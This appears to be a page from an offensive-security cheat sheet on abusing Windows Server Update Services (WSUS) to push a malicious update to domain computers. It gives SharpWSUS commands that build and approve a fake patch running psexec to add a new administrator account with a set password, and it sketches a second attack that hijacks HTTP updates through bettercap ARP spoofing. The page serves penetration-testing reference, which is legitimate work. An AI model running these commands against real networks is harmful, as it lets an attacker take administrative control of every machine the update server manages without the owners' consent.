search
githubEdit

Windows Server Update Services (WSUS)

Push an evil update on the computers

hashtag
1) Locate the WSUS server

./SharpWSUS locate

hashtag
2) Find a way to compromise it

hashtag
3) Enumerate the contents of the WSUS server to determine which machines to target

./SharpWSUS.exe inspect

hashtag
4) Create a malicious patch with a Microsoft signed binary (mandatory)

./SharpWSUS.exe create /payload:"C:\tmp\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user user1 Password123! /add && net localgroup administrators user1 /add\"" /title:"EvilWSUS"

hashtag
5) Create a WSUS group, add the target machine to the WSUS group and approve the malicious patch for deployment

./SharpWSUS.exe approve /updateid:<GUID_from_create> /computername:<target> /groupname:"Evil Group"

hashtag
6) Wait for the client to download the patch, not possible to control

./SharpWSUS.exe check /updateid:<GUID_from_create> /computername:<target>

hashtag
7) Clean up after the patch is downloaded.

Spoof the WSUS server and hijack the update if the updates are pushed through HTTP and not HTTPS

hashtag
1) Find the WSUS server with the REG key

hashtag
2) Setup the fake WSUS server

hashtag
3) And ARP spoofing with bettercap and a wsus_spoofing.cap like this:

quick recon of the network

set the ARP spoofing

reroute traffic aimed at the WSUS server

control logging and verbosity

start the modules

THEN

Now wait for update verification or manually trigger with a GUI access on the machine.

PreviousJenkinsNextFile Execution

Last updated